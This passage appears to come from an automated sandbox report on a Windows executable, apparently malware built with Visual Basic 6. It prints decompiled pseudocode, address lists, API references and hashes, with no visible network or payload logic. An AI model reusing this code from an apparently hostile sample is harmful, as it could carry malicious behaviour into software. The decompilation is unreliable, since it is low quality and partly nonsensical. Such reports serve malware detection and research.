						__edi = __edi -  *(__ecx + 0x14);
						__ebx =  *(__ecx + 0x1c);
						_v100 = __edi;
						_t118 = __edi - 1; // -1
						__edx = _t118;
						_v124 = __ebx;
						_t118 * __eax = _t118 * __eax - __ebx;
						__esi =  *0x46c068; // 0x0
						__edx = _t118 * __eax - __ebx + __esi;
						__edi = __edi + 1;
						__edi = __edi * __eax;
						__eax = __eax * _v100;
						__eax = __eax - _v124;
						__edi = __edi - __ebx;
						__ebx =  *0x46c068; // 0x0
						_v108 = __edx;
						__edx =  *(__ecx + 0x20);
						__eax = __eax + __ebx;
						__edi = __edi + __ebx;
						__esi =  *(__ecx + 0x24);
						__ebx = __eax - 1;
						__ecx =  *(__ecx + 0xc);
						(__eax - 1) * __edx = (__eax - 1) * __edx - __esi;
						_v116 = __eax;
						_v132 = (__eax - 1) * __edx - __esi;
						__ebx = __eax + 1;
						__ebx = (__eax + 1) * __edx;
						__eax = _v132;
						__ebx = __ebx - __esi;
						__eax =  *(__ecx + 8 + _v132 * 4);
						__eax =  *(__ecx + 8 + _v132 * 4) +  *((intOrPtr*)(__ecx + 8 + __ebx * 4));
						_t137 = __edi - 1; // 0x0
						_t137 = _t137 * __edx;
						__ebx = _t137 * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__ecx + 8 + (_t137 * __edx - __esi) * 4));
						_t141 = __edi + 1; // 0x2
						_t141 = _t141 * __edx;
						__edi = __edi * __edx;
						__ebx = _t141 * __edx - __esi;
						__edi = __edi - __esi;
						__eax = __eax +  *((intOrPtr*)(__ecx + 8 + (_t141 * __edx - __esi) * 4));
						_v108 = _v108 - 1;
						(_v108 - 1) * __edx = (_v108 - 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__ecx + 8 + ((_v108 - 1) * __edx - __esi) * 4));
						_v108 = _v108 + 1;
						(_v108 + 1) * __edx = (_v108 + 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__ecx + 8 + ((_v108 + 1) * __edx - __esi) * 4));
						__ebx = _v116;
						__ebx = _v116 * __edx;
						__edx = __edx * _v108;
						__ebx = __ebx - __esi;
						__edx = __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__ecx + 8 + __ebx * 4));
						__ebx =  *(__ecx + 8 + __edi * 4);
						__edi =  *(__ecx + 8 + __edx * 4);
						__eax = __eax + __ebx;
						__eax = __eax +  *(__ecx + 8 + __edx * 4);
						__edi = _a4;
						asm("cdq");
						__eax = __eax ^ __edx;
						 *0x46c080 = __eax;
						__ecx =  *__edi;
						__eax =  *((intOrPtr*)( *__edi + 0x334))(__edi);
						__ebx = __imp____vbaObjSet;
						__edx =  &_v28;
						__esi =  *__ebx( &_v28, __eax);
						__ecx =  &_v64;
						__eax =  *__esi;
						__eax =  *((intOrPtr*)( *__esi + 0xe0))(__esi,  &_v64);
						asm("fclex");
						if(__eax < 0) {
							__imp____vbaHresultCheckObj(__eax, __esi, 0x40937c, 0xe0);
						}
						asm("fild dword [0x46c080]");
						__esi = __imp____vbaFpI2;
						_v140 = __fp0;
						__fp0 = _v140;
						if( *0x46c000 != 0) {
							_push( *0x401434);
							_push( *0x401430);
							L00401EB4();
						} else {
							__fp0 = __fp0 /  *0x401430;
						}
						asm("fnstsw ax");
						if((__al & 0x0000000d) != 0) {
							L25:
							return __imp____vbaFPException();
						} else {
							__eax =  *__esi();
							asm("fild dword [0x46c07c]");
							_push(__eax);
							_v148 = __fp0;
							__fp0 = _v148;
							if( *0x46c000 != 0) {
								_push( *0x401434);
								_push( *0x401430);
								L00401EB4();
							} else {
								__fp0 = __fp0 /  *0x401430;
							}
							asm("fnstsw ax");
							if((__al & 0x0000000d) != 0) {
								goto L25;
							} else {
								__eax =  *__esi();
								asm("fild dword [0x46c078]");
								_push(__eax);
								_v156 = __fp0;
								__fp0 = _v156;
								if( *0x46c000 != 0) {
									_push( *0x401434);
									_push( *0x401430);
									L00401EB4();
								} else {
									__fp0 = __fp0 /  *0x401430;
								}
								asm("fnstsw ax");
								if((__al & 0x0000000d) != 0) {
									goto L25;
								} else {
									__eax =  *__esi();
									__imp__#588(__eax);
									__edx =  *0x46c06c; // 0x0
									__ecx = _v64;
									__eax =  *0x46c068; // 0x0
									E00408D18();
									__imp____vbaSetSystemError(_v64, __eax, __edx, __eax);
									__ecx =  &_v28;
									__imp____vbaFreeObj();
									__eax =  *0x46c06c; // 0x0
									__esi =  *0x46c068; // 0x0
									__ecx = 1;
									__eax = __eax + 1;
									 *0x46c06c = __eax;
									continue;
								}
							}
						}
					}
					__edx =  *0x46c070; // 0x0
					__esi = __esi + __esi * 4;
					__esp = __esp - 0x10;
					__eax = __esi + __esi * 4;
					_t187 = __edx - 1; // -1
					__ecx = _t187;
					__eax = __esi + __esi * 4 << 2;
					asm("cdq");
					_t189 = __eax % __ecx;
					__eax = __eax / __ecx;
					__edx = _t189;
					__edx = __esp;
					_v160 = __eax;
					__eax = 4;
					asm("fild dword [ebp-0x9c]");
					 *__edx = 4;
					__eax = _v40;
					_v36 = __fp0;
					__ecx = _v36;
					 *(__edx + 4) = _v40;
					__eax = _v32;
					 *(__edx + 8) = _v36;
					__ecx =  *__edi;
					 *((intOrPtr*)(__edx + 0xc)) = _v32;
					__eax =  *((intOrPtr*)( *__edi + 0x488))(__edi, 5);
					__edx =  &_v28;
					__eax =  *__ebx( &_v28, _v32);
					__imp____vbaLateIdSt(_v32);
					__ecx =  &_v28;
					__imp____vbaFreeObj();
					__esi =  *0x46c068; // 0x0
					__eax = 1;
					__esi = __esi + 1;
					 *0x46c068 = __esi;
				}
				__eax =  *__edi;
				__eax =  *((intOrPtr*)( *__edi + 0x334))(__edi);
				__ecx =  &_v28;
				__eax =  *__ebx( &_v28,  *__edi);
				__esi =  *__edi;
				__edx =  *__esi;
				__eax =  *((intOrPtr*)( *__esi + 0x264))(__esi);
				asm("fclex");
				if(__eax < 0) {
					__imp____vbaHresultCheckObj(__eax, __esi, 0x40937c, 0x264);
				}
				__esi = __imp____vbaFreeObj;
				__ecx =  &_v28;
				__eax =  *__esi();
				__esp = __esp - 0x10;
				__ecx = 4;
				__edx = __esp;
				__eax = 0;
				 *__edx = 4;
				__ecx = _v40;
				 *(__edx + 4) = _v40;
				__ecx =  *__edi;
				 *(__edx + 8) = 0;
				__eax = _v32;
				 *((intOrPtr*)(__edx + 0xc)) = _v32;
				__eax =  *((intOrPtr*)( *__edi + 0x488))(__edi, 5);
				__edx =  &_v28;
				__eax =  *__ebx( &_v28, _v32);
				__imp____vbaLateIdSt(_v32);
				__ecx =  &_v28;
				__eax =  *__esi();
				_v8 = 0;
				asm("wait");
				_push(0x451441);
				return _v32;
			}

0x00450ed3
0x00450ee2
0x00450ef2
0x00450ef5
0x00450efc
0x00450f04
0x00450f07
0x00450f0b
0x00450f10
0x00450f15
0x00450f18
0x00450f1b
0x00450f1e
0x00450f23
0x00450f28
0x00450f3a
0x00450f3d
0x00450f43
0x00450f4c
0x00450f52
0x00450f55
0x00450f5a
0x00450f5f
0x00450f68
0x00450f6e
0x00450f71
0x00450f74
0x00450f76
0x00450f79
0x00450f7c
0x00450f82
0x00450f85
0x00450f87
0x00450f8a
0x00450f8c
0x00450f8d
0x00450f90
0x00450f93
0x00450f96
0x00450f98
0x00450f9e
0x00450fa0
0x00450fa3
0x00450fa9
0x00450fad
0x00450faf
0x00450fb5
0x00450fb7
0x00450fba
0x00450fbd
0x00450fc3
0x00450fc6
0x00450fc8
0x00450fcb
0x00450fce
0x00450fd1
0x00450fd4
0x00450fd6
0x00450fd9
0x00450fdf
0x00450fe3
0x00450fe5
0x00450feb
0x00450fef
0x00450ff1
0x00450ff7
0x00450ffb
0x00450ffd
0x00451003
0x00451007
0x00451009
0x0045100f
0x00451012
0x00451014
0x00451017
0x0045101a
0x0045101d
0x00451021
0x00451023
0x00451025
0x00451028
0x0045102b
0x0045102d
0x0045102e
0x00451032
0x00451037
0x0045103c
0x0045103f
0x00451041
0x00451044
0x00451047
0x0045104a
0x0045104a
0x0045104d
0x00451050
0x00451053
0x00451056
0x00451058
0x0045105e
0x00451061
0x00451063
0x00451064
0x00451067
0x0045106a
0x0045106d
0x0045106f
0x00451075
0x00451077
0x0045107a
0x00451080
0x00451084
0x00451086
0x0045108c
0x0045108e
0x00451091
0x00451094
0x0045109a
0x0045109d
0x0045109f
0x004510a2
0x004510a5
0x004510a8
0x004510ab
0x004510ad
0x004510b1
0x004510b8
0x004510bc
0x004510be
0x004510c5
0x004510c9
0x004510cb
0x004510d2
0x004510d6
0x004510d8
0x004510df
0x004510e3
0x004510e5
0x004510ec
0x004510ef
0x004510f1
0x004510f5
0x004510f8
0x004510fb
0x004510ff
0x00451101
0x00451103
0x00451107
0x0045110b
0x00451111
0x00451113
0x00451114
0x00451118
0x0045111d
0x00451120
0x00451123
0x00451125
0x00451128
0x0045112b
0x0045112b
0x0045112e
0x00451134
0x00451136
0x0045113c
0x0045113e
0x0045113f
0x00451142
0x00451146
0x00451149
0x0045114b
0x00451151
0x00451154
0x00451157
0x00451159
0x0045115b
0x0045115e
0x00451161
0x00451167
0x00451169
0x0045116c
0x0045116f
0x00451172
0x00451175
0x00451178
0x0045117a
0x0045117e
0x00451182
0x00451185
0x00451188
0x0045118a
0x0045118e
0x00451191
0x00451194
0x00451197
0x00451199
0x0045119b
0x004511a2
0x004511a6
0x004511a8
0x004511af
0x004511b3
0x004511b5
0x004511b9
0x004511bc
0x004511bf
0x004511c3
0x004511c5
0x004511c7
0x004511cb
0x004511cf
0x004511d3
0x004511d5
0x004511d7
0x004511da
0x004511db
0x004511e0
0x004511e5
0x004511e7
0x004511ed
0x004511f3
0x004511fa
0x004511fc
0x00451201
0x00451203
0x0045120b
0x0045120d
0x0045121b
0x0045121b
0x00451221
0x00451227
0x0045122d
0x00451233
0x00451240
0x0045124a
0x00451250
0x00451256
0x00451242
0x00451242
0x00451242
0x0045125b
0x0045125f
0x00451460
0x00401e9c
0x00451265
0x00451265
0x00451267
0x0045126d
0x0045126e
0x00451274
0x00451281
0x0045128b
0x00451291
0x00451297
0x00451283
0x00451283
0x00451283
0x0045129c
0x004512a0
0x00000000
0x004512a6
0x004512a6
0x004512a8
0x004512ae
0x004512af
0x004512b5
0x004512c2
0x004512cc
0x004512d2
0x004512d8
0x004512c4
0x004512c4
0x004512c4
0x004512dd
0x004512e1
0x00000000
0x004512e7
0x004512e7
0x004512ea
0x004512f0
0x004512f6
0x004512fa
0x00451302
0x00451307
0x0045130d
0x00451310
0x00451316
0x0045131b
0x00451321
0x00451326
0x00451328
0x00000000
0x00451328
0x004512e1
0x004512a0
0x0045125f
0x00451332
0x00451338
0x0045133b
0x0045133e
0x00451341
0x00451341
0x00451344
0x00451347
0x00451348
0x00451348
0x00451348
0x0045134a
0x0045134f
0x00451355
0x0045135a
0x00451360
0x00451362
0x00451365
0x00451368
0x0045136b
0x0045136e
0x00451371
0x00451374
0x00451376
0x00451379
0x0045137f
0x00451384
0x00451387
0x0045138d
0x00451390
0x00451396
0x0045139c
0x004513a1
0x004513a3
0x004513a3
0x004513ae
0x004513b1
0x004513b7
0x004513bc
0x004513be
0x004513c1
0x004513c3
0x004513cb
0x004513cd
0x004513db
0x004513db
0x004513e1
0x004513e7
0x004513ea
0x004513ec
0x004513ef
0x004513f4
0x004513f6
0x004513fb
0x004513fd
0x00451400
0x00451403
0x00451405
0x00451408
0x0045140b
0x0045140e
0x00451414
0x00451419
0x0045141c
0x00451422
0x00451425
0x00451427
0x0045142e
0x0045142f
0x00000000

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

Part of subcall function 00462140: __vbaRedim.MSVBVM60(00000080,00000004,0046C088,00000003,00000003,00000000,00000000,00000000,00000000,00000002,00000000,00401438), ref: 00462196
Part of subcall function 00462140: __vbaNew2.MSVBVM60(00405960,0046C010), ref: 004621FF
Part of subcall function 00462140: __vbaObjSet.MSVBVM60(?,00000000), ref: 00462218
Part of subcall function 00462140: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0046223F
Part of subcall function 00462140: __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0046225D
Part of subcall function 00462140: __vbaFreeObj.MSVBVM60 ref: 0046226C

__vbaObjSet.MSVBVM60(?,00000000), ref: 004511F8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0045121B
_adj_fdiv_m64.MSVBVM60 ref: 00451256
__vbaFpI2.MSVBVM60 ref: 00451265
_adj_fdiv_m64.MSVBVM60(00000000), ref: 00451297
__vbaFpI2.MSVBVM60(00000000), ref: 004512A6
_adj_fdiv_m64.MSVBVM60(00000000), ref: 004512D8
__vbaFpI2.MSVBVM60(00000000), ref: 004512E7
#588.MSVBVM60(00000000), ref: 004512EA
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 00451307
__vbaFreeObj.MSVBVM60 ref: 00451310
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451384
__vbaLateIdSt.MSVBVM60(00000000), ref: 00451387
__vbaFreeObj.MSVBVM60 ref: 00451390
__vbaObjSet.MSVBVM60(?,00000000), ref: 004513BC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 004513DB
__vbaFreeObj.MSVBVM60 ref: 004513EA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451419
__vbaLateIdSt.MSVBVM60(00000000), ref: 0045141C
__vbaFreeObj.MSVBVM60 ref: 00451425

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2_adj_fdiv_m64$ErrorLateSystem$#588ListRedim
String ID:
API String ID: 2030766546-0
Opcode ID: 98a7bcc9753dbb6ec0b81512f0e3ab333cb48328528ab624b800640df8842574
Instruction ID: 79140def026b1083ef3ccf53e9c3dac3afd8e09309b47227695a3d4d52b0d75c
Opcode Fuzzy Hash: 98a7bcc9753dbb6ec0b81512f0e3ab333cb48328528ab624b800640df8842574
Instruction Fuzzy Hash: 17026D71A00305DFCB04CFACCAC9A99FBB5FF49304F14826AD548AB2A5D774A856CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00455380, Relevance: 30.4, APIs: 20, Instructions: 352
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00455380(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				signed char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				intOrPtr _v148;
				intOrPtr _v156;
				intOrPtr _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				intOrPtr* _v188;
				intOrPtr* _v196;
				signed int _v248;
				void* _t135;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t149;
				void* _t154;
				void* _t158;
				void* _t162;
				void* _t167;
				signed char _t169;
				intOrPtr* _t172;
				signed char _t188;
				void* _t190;
				char* _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t202;
				void* _t203;
				intOrPtr* _t224;
				intOrPtr _t225;
				intOrPtr* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t254;
				signed int _t256;
				signed int _t257;
				signed char _t258;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				void* _t264;
				intOrPtr* _t265;
				intOrPtr* _t266;
				intOrPtr* _t267;
				intOrPtr* _t268;
				intOrPtr* _t269;
				intOrPtr* _t270;
				intOrPtr* _t271;
				intOrPtr _t277;
				intOrPtr _t279;

				_t262 = _t261 - 0xc;
				 *[fs:0x0] = _t262;
				_t263 = _t262 - 0xe4;
				_v16 = _t263;
				_v12 = 0x401660;
				_t256 = _a4;
				_v8 = _t256 & 0x00000001;
				_t257 = _t256 & 0xfffffffe;
				_a4 = _t257;
				 *((intOrPtr*)( *_t257 + 4))(_t257, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t259);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v172 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				E00461600(0, __edi, _t257);
				_t135 =  *((intOrPtr*)( *_t257 + 0x328))(_t257);
				_t254 = __imp____vbaObjSet;
				_t137 =  *_t254( &_v40, _t135);
				_v196 = _t137;
				_t139 =  *_t254( &_v28,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				_v188 = _t139;
				_t140 =  *((intOrPtr*)( *_t139 + 0x188))(_t139,  &_v32);
				asm("fclex");
				if(_t140 < 0) {
					__imp____vbaHresultCheckObj(__eax, _v188, 0x40937c, 0x188);
				}
				_v32 = 0;
				_t143 =  *_t254( &_v36, _v32);
				_t197 = _v196;
				_t144 =  *((intOrPtr*)( *_v196 + 0x64))(_t197, _t143);
				asm("fclex");
				if(_t144 < 0) {
					__imp____vbaHresultCheckObj(_t144, _t197, 0x40937c, 0x64);
				}
				__imp____vbaFreeObjList(3,  &_v28,  &_v36,  &_v40);
				_t264 = _t263 + 0x10;
				_t198 =  *_t254( &_v28,  *((intOrPtr*)( *_t257 + 0x328))(_t257));
				_t149 =  *((intOrPtr*)( *_t198 + 0x60))(_t198,  &_v32);
				asm("fclex");
				if(_t149 < 0) {
					__imp____vbaHresultCheckObj(_t149, _t198, 0x40937c, 0x60);
				}
				_t199 =  *_t254( &_v36,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				_t154 =  *((intOrPtr*)( *_t199 + 0x108))(_t199,  &_v172);
				asm("fclex");
				if(_t154 < 0) {
					__imp____vbaHresultCheckObj(_t154, _t199, 0x40937c, 0x108);
				}
				_t200 =  *_t254( &_v40,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				_t158 =  *((intOrPtr*)( *_t200 + 0x110))(_t200,  &_v176);
				asm("fclex");
				if(_t158 < 0) {
					__imp____vbaHresultCheckObj(_t158, _t200, 0x40937c, 0x110);
				}
				_t201 =  *_t254( &_v44,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				_t162 =  *((intOrPtr*)( *_t201 + 0x108))(_t201,  &_v180);
				asm("fclex");
				if(_t162 < 0) {
					__imp____vbaHresultCheckObj(_t162, _t201, 0x40937c, 0x108);
				}
				_t202 =  *_t254( &_v48,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				_t167 =  *((intOrPtr*)( *_t202 + 0x110))(_t202,  &_v184);
				asm("fclex");
				if(_t167 < 0) {
					__imp____vbaHresultCheckObj(_t167, _t202, 0x40937c, 0x110);
				}
				_t169 =  *_t254( &_v56,  *((intOrPtr*)( *_t257 + 0x334))(_t257));
				asm("fchs");
				_t258 = _t169;
				_v80 = _v184;
				asm("fnstsw ax");
				if((_t169 & 0x0000000d) == 0) {
					asm("fchs");
					_v64 = _v180;
					asm("fnstsw ax");
					if((_t169 & 0x0000000d) != 0) {
						goto L23;
					}
					_t265 = _t264 - 0x10;
					_v248 = _v32;
					_t172 = _t265;
					_t266 = _t265 - 0x10;
					 *_t172 = 3;
					_v104 = 0xa;
					_v96 = 0x80020004;
					 *((intOrPtr*)(_t172 + 4)) = _v164;
					_t243 = _t266;
					_t267 = _t266 - 0x10;
					_v32 = 0;
					 *((intOrPtr*)(_t172 + 8)) = 0xcc0020;
					_t203 =  *_t258;
					_v72 = 4;
					 *((intOrPtr*)(_t172 + 0xc)) = _v156;
					 *_t243 = 0xa;
					 *((intOrPtr*)(_t243 + 4)) = _v148;
					 *((intOrPtr*)(_t243 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t243 + 0xc)) = _v140;
					_t244 = _t267;
					_t268 = _t267 - 0x10;
					 *_t244 = 0xa;
					 *((intOrPtr*)(_t244 + 4)) = _v132;
					 *((intOrPtr*)(_t244 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t244 + 0xc)) = _v124;
					_t245 = _t268;
					_t269 = _t268 - 0x10;
					 *_t245 = 0xa;
					 *((intOrPtr*)(_t245 + 4)) = _v116;
					 *((intOrPtr*)(_t245 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t245 + 0xc)) = _v108;
					_t246 = _t269;
					_t270 = _t269 - 0x10;
					 *_t246 = _v104;
					 *((intOrPtr*)(_t246 + 4)) = _v100;
					 *((intOrPtr*)(_t246 + 8)) = _v96;
					 *((intOrPtr*)(_t246 + 0xc)) = _v92;
					_t247 = _t270;
					 *_t247 = 4;
					 *((intOrPtr*)(_t247 + 4)) = _v84;
					_t271 = _t270 - 0x10;
					 *((intOrPtr*)(_t247 + 8)) = _v80;
					_t224 = _t271;
					 *((intOrPtr*)(_t247 + 0xc)) = _v76;
					 *_t224 = _v72;
					_t277 = _v176 -  *0x401638;
					 *((intOrPtr*)(_t224 + 4)) = _v68;
					_t188 = _v60;
					 *((intOrPtr*)(_t224 + 8)) = _v64;
					 *(_t224 + 0xc) = _t188;
					_push(_t224);
					asm("fnstsw ax");
					if((_t188 & 0x0000000d) != 0) {
						goto L23;
					}
					 *_t271 = _t277;
					_t279 = _v172 -  *0x401638;
					_push(_t224);
					_t225 = _v248;
					asm("fnstsw ax");
					if((_t188 & 0x0000000d) != 0) {
						goto L23;
					}
					 *_t271 = _t279;
					_t190 =  *((intOrPtr*)(_t203 + 0x280))(_t258,  *_t254( &_v52, _t225));
					asm("fclex");
					if(_t190 < 0) {
						__imp____vbaHresultCheckObj(_t190, _t258, 0x40937c, 0x280);
					}
					_t193 =  &_v28;
					__imp____vbaFreeObjList(7, _t193,  &_v36,  &_v40,  &_v44,  &_v48,  &_v52,  &_v56);
					_v8 = 0;
					asm("wait");
					_push(0x4557c7);
					return _t193;
				}
				return __imp____vbaFPException();
			}

0x00455383
0x00455392
0x00455399
0x004553a2
0x004553a5
0x004553ac
0x004553b4
0x004553b7
0x004553bb
0x004553c0
0x004553c5
0x004553c8
0x004553cb
0x004553ce
0x004553d1
0x004553d4
0x004553d7
0x004553da
0x004553dd
0x004553e3
0x004553e9
0x004553ef
0x004553f5
0x004553fd
0x00455403
0x0045540e
0x00455413
0x00455424
0x0045542d
0x00455433
0x0045543b
0x0045543d
0x00455451
0x00455451
0x00455464
0x0045546a
0x0045546e
0x00455476
0x0045547b
0x0045547d
0x00455488
0x00455488
0x0045549c
0x004554a4
0x004554b5
0x004554be
0x004554c3
0x004554c5
0x004554d0
0x004554d0
0x004554e6
0x004554f2
0x004554fa
0x004554fc
0x0045550a
0x0045550a
0x00455520
0x0045552c
0x00455534
0x00455536
0x00455544
0x00455544
0x0045555a
0x00455566
0x0045556e
0x00455570
0x0045557e
0x0045557e
0x00455594
0x004555a0
0x004555a8
0x004555aa
0x004555b8
0x004555b8
0x004555cc
0x004555d4
0x004555d6
0x004555dd
0x004555e0
0x004555e4
0x004555f0
0x004555f2
0x004555f5
0x004555f9
0x00000000
0x00000000
0x00455602
0x00455605
0x0045560b
0x00455612
0x00455615
0x0045561d
0x00455624
0x0045562b
0x0045562e
0x00455630
0x00455633
0x0045563a
0x00455643
0x00455645
0x0045564c
0x0045565a
0x00455662
0x0045566a
0x00455672
0x00455675
0x0045567a
0x0045567d
0x00455682
0x0045568a
0x00455692
0x00455695
0x0045569a
0x0045569d
0x004556a2
0x004556aa
0x004556b0
0x004556b6
0x004556b8
0x004556bb
0x004556c0
0x004556c6
0x004556ce
0x004556d1
0x004556d3
0x004556db
0x004556e1
0x004556e4
0x004556e7
0x004556ef
0x004556f8
0x004556fd
0x00455703
0x00455706
0x00455709
0x0045570f
0x00455712
0x00455713
0x00455717
0x00000000
0x00000000
0x0045571d
0x00455726
0x0045572c
0x0045572d
0x00455733
0x00455737
0x00000000
0x00000000
0x0045573d
0x00455746
0x0045574e
0x00455750
0x0045575e
0x0045575e
0x0045577b
0x00455782
0x0045578b
0x00455792
0x00455793
0x00000000
0x00455793
0x00401e9c

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 0045540E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00455424
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000188), ref: 00455451
__vbaObjSet.MSVBVM60(?,?), ref: 0045546A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064), ref: 00455488
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0045549C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004554B3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000060), ref: 004554D0
__vbaObjSet.MSVBVM60(?,00000000), ref: 004554E4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000108), ref: 0045550A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045551E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000110), ref: 00455544
__vbaObjSet.MSVBVM60(?,00000000), ref: 00455558
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000108), ref: 0045557E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00455592
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000110), ref: 004555B8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004555CC
__vbaObjSet.MSVBVM60(?,?), ref: 00455742
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000280), ref: 0045575E
__vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00455782

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$New2
String ID:
API String ID: 3286097656-0
Opcode ID: 27ab60674cce7d22c558108e05d79de39c4a9b7617cc676467826a78e3ae5398
